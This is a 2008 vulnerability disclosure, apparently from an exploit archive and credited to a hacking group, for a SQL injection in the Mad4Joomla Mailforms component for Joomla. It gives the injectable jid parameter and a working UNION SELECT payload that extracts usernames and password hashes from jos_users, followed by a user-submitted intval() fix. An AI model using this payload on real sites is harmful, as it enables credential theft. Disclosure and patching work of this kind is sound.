Joomla Component mad4joomla SQL Injection Vulnerability

2008-10-10 23:01:03

#############################################################################
# #
# Joomla Component Mad4Joomla Mailforms SQL Injection Vulnerability #
# #
#############################################################################


########################################

[~] Vulnerability found by: H!tm@N
[~] Contact: hitman[at]khg-crew[dot]ws
[~] Site: www.khg-crew.ws
[~] Greetz: boom3rang, KHG, urtan, chs, redc00de - [-=Kosova Hackers Group=-]

########################################

[~] ScriptName: "Joomla"
[~] Component: "Mad4Joomla Mailforms (com_mad4joomla)"
[~] Author: "Dipl. Inf. Fahrettin Kutyol"
[~] Author E-mail: "[email protected]"
[~] Author URL: "www.mad4media.de"

########################################

[~] Exploit: /index.php?option=com_mad4joomla&jid=[SQL]

[~] Example: /index.php?option=com_mad4joomla&jid=-2+union+select+1,concat(username,char(58),password)KHG,3,4+from+jos_users--



########################################

[~] Proud 2 be Albanian
[~] Proud 2 be Muslim
[~] United States of Albania

########################################

#

Fixes

http://www.mad4media.de/mad4joomla-mailforms-faq.html

How to fix the security vulnerability without reinstalling the component.

Edit the file:
components/com_mad4joomla/mad4joomla.php

Find this:
$jid = mosGetParam($_REQUEST, ‘jid’); [between line 45-70]

Change it to:
$jid = intval(mosGetParam($_REQUEST, ‘jid’));

Save and upload the file again.
tafaz 11.11.2008

---

In order to submit a new fix you need to be registered.